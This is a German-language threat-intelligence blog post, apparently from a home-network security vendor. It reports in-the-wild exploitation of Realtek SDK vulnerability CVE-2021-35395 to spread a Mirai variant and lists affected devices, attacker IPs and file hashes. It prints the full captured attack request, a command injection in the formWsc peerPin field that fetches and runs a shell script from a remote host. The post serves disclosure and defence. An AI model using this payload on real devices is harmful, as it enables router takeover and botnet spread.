Am 16. August, also vor neun Tagen, wurden mehrere Schwachstellen in einem Software-SDK, das als Teil von Realtek-Chipsätzen vertrieben wird, vom IoT Inspector Research Lab bekannt gegeben. Die Schwachstellen ermöglichen es Angreifern, die betroffenen Geräte vollständig zu kompromittieren und die Kontrolle darüber zu übernehmen. Eine Woche nach der Veröffentlichung, entdeckte die Heimsicherheitslösung Secure Home (Inspector Research) Versuche, diese Schwachstellen auszunutzen, um eine Variante der Mirai-Malware zu verbreiten.
Eine der aufgedeckten Schwachstellen, CVE-2021-35395, betrifft die Webschnittstelle, die Teil des SDK ist, und ist eine Sammlung von 6 verschiedenen Schwachstellen. Seit dem 18. August haben wir Versuche zur Ausnutzung von CVE-2021-35395 in freier Wildbahn identifiziert.
Wir haben insbesondere Exploit-Versuche auf den Webseiten „formWsc“ und „formSysCmd“ festgestellt. Mit dem Exploit wird versucht, eine Mirai-Variante einzusetzen, die im März von Palo Alto Networks entdeckt wurde. Mirai ist eine berüchtigte IoT- und Router-Malware, die in den letzten 5 Jahren in verschiedenen Formen im Umlauf war. Ursprünglich wurde sie eingesetzt, um große Teile des Internets lahmzulegen, hat sich aber inzwischen zu vielen Varianten für unterschiedliche Zwecke entwickelt [4].
Derselbe Angreifer - unterschiedliche Vorfälle:
Ein ähnlicher Vorfall wurde vor zwei Wochen, am 6. August, von Juniper Networks gemeldet [5]. Eine neu entdeckte Schwachstelle wurde dann nur zwei Tage nach der Veröffentlichung in freier Wildbahn ausgenutzt, um dieselbe Mirai-Variante zu verbreiten.
Der Webserver, der das Mirai-Botnetz bedient, verwendet dasselbe Netzwerk-Subnetz, was darauf hindeutet, dass derselbe Angreifer in beide Vorfälle verwickelt ist.
Diese Kette von Ereignissen zeigt, dass Hacker aktiv nach Schwachstellen für die Befehlsinjektion suchen und sie nutzen, um weit verbreitete Malware schnell zu verbreiten. Diese Art von Schwachstellen sind leicht auszunutzen und können schnell in bestehende Hacking-Frameworks integriert werden, die Angreifer einsetzen, lange bevor Geräte gepatcht werden und Sicherheitsanbieter reagieren können.
Die Sicherheitsforschungsgruppe von SAM verfolgt veröffentlichte Schwachstellen und blockiert sie schnell mit virtuellem IoT-Patching (lesen Sie unseren jüngsten Artikel, um mehr zu erfahren). Die oben genannten Schwachstellen wurden innerhalb eines Tages nach ihrer Veröffentlichung blockiert, so dass alle potenziell gefährdeten Geräte geschützt sind.
Betroffene Geräte:
Die betreffenden SoCs RTL8xxx (Modellnummern: EV-2009-02-06, EV-2010-09-20, EV-2006-07-27, EV-2009-02-06, EV-2010-09-20), RTL8196C (EV-2009-02-06), RTL8186 (EV-2006-07-27) und RTL8671 (EV-2006-07-27, EV-2010-09-20) kommen laut IoT Inspector etwa in VoIP- und Wireless-Routern, Repeatern, IP-Kameras und smarten Beleuchtungssteuerungen zum Einsatz. Konkret seien Produkte von mindestens 65 Herstellern, darunter beispielsweise AsusTEK, Belkin, D-Link, Edimax, Hama, Logitec und Netgear, betroffen.
Laut der ursprünglichen Untersuchung wird das anfällige Realtek SDK von mehr als 65 Anbietern auf über 200 Geräten verwendet. Laut SAMs eigener Untersuchung der angeschlossenen Geräte, die auf anonym gesammelten Netzwerkdaten von mehr als 2 Millionen Heim- und Unternehmensnetzwerken basiert, sind die folgenden Geräte die am häufigsten verwendeten Geräte mit dem Realtek SDK - siehe auch hier → https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
Netis E1+ Extender
Edimax N150 und N300 Wi-Fi-Router
Repotec RP-WR5444-Router
Diese Geräte werden hauptsächlich zur Verbesserung des Wi-Fi-Empfangs verwendet.
Vollständige Angriffsdetails:
Der Angriff ging von 31.210.20[.]100 aus. Wir gehen jedoch davon aus, dass sich die IP-Adressen der Angreifer im Laufe der Zeit ändern werden.
Die vollständige Angriffs-Nutzlast:
POST /goform/formWsc HTTP/1.1
Verbindung: close
Inhalt-Typ: anwendung/x-www-form-urlencoded
Benutzer-Agent: Dark
Payload:
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; wget http://212.192.241.87/lolol.sh; curl -O http://212.192.241.87/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
IOCs
IP addresses – 31.210.20[.]100, 212.192.241[.]87
Files –
| Filename | Hash (sha256) |
|---|---|
| dark.x86 | a3ee4bd2f330bf6939cb9121f36261e42f54ffc45676120216fd8da4cb52036a |
| dark.mips | 9dfaa2e60027427c9f1ff377ad3cd3bc800b914c4b9ea5e408442d25f475dab9 |
| dark.mpsl | 24d6cd113c9ddf49cb6140d2cc185f2cc033170ac27e2c352d94848cc449c312 |
| dark.arm4 | caa8b10057fb699d463f309913d0557462e8b37afdaf4d0c3cff63f9b9605f0d |
| dark.arm5 | fd7da924fe743d2e09b10f4e8a01230f7bc884ae14ef0e6133e553de118a457e |
| dark.arm6 | 0c734c8c0f8e575a08672d01fc5a729605b3e9dbb4d0c62bd94ad86d2c3d6aeb |
| dark.arm7 | 85b07054472bbaa06d0611dfb28632ffa351d3b13e37b447914f49a1dfe07dc4 |
| dark.ppc | a5478d51a809aed51d633611371c105e3ec82490f9516d186e7013dabcf8c77f |
| dark.m68k | bf9d92666d3b25cf6e49234472a2fa515107eb6df07f4aee6deb6a42eed4fa92 |
| dark.sh4 | 16787be5e8d7de5816d590efb4916c7415f458bc7059d2d287715fb3ef8e0783 |
| dark.86_64 | 67a655d4360cfe0ca5db17c6486f3dfbca1c82c2af4bc1f2019cee68199108c7 |